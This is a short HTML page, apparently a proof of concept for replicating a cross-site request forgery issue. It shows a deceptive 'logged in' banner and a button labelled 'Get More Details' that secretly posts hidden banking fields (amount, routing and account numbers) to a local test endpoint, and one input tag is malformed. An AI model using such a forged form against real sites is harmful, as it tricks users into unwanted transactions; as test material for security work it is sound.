<!DOCTYPE html>
<html>
<head>
<meta charset="ISO-8859-1">
<title>Cross Site Request Forgery - Issue Replication</title>
</head>
<body>
<form action="http://localhost:8090/test/sample" method="post">
<center><h3>Welcome Greg, You have logged into the session successfully.</h3>
<in3put3 type="hidden" name="amountBalance" value="100.00"/>
<input type="hidden" name="routingNumber" value="51782"/>
<input type="hidden" name="accountNumber" value="EPK1458753"/>
<input type="submit" value="Get More Details"/>
</center>
</form>
</body>
</html>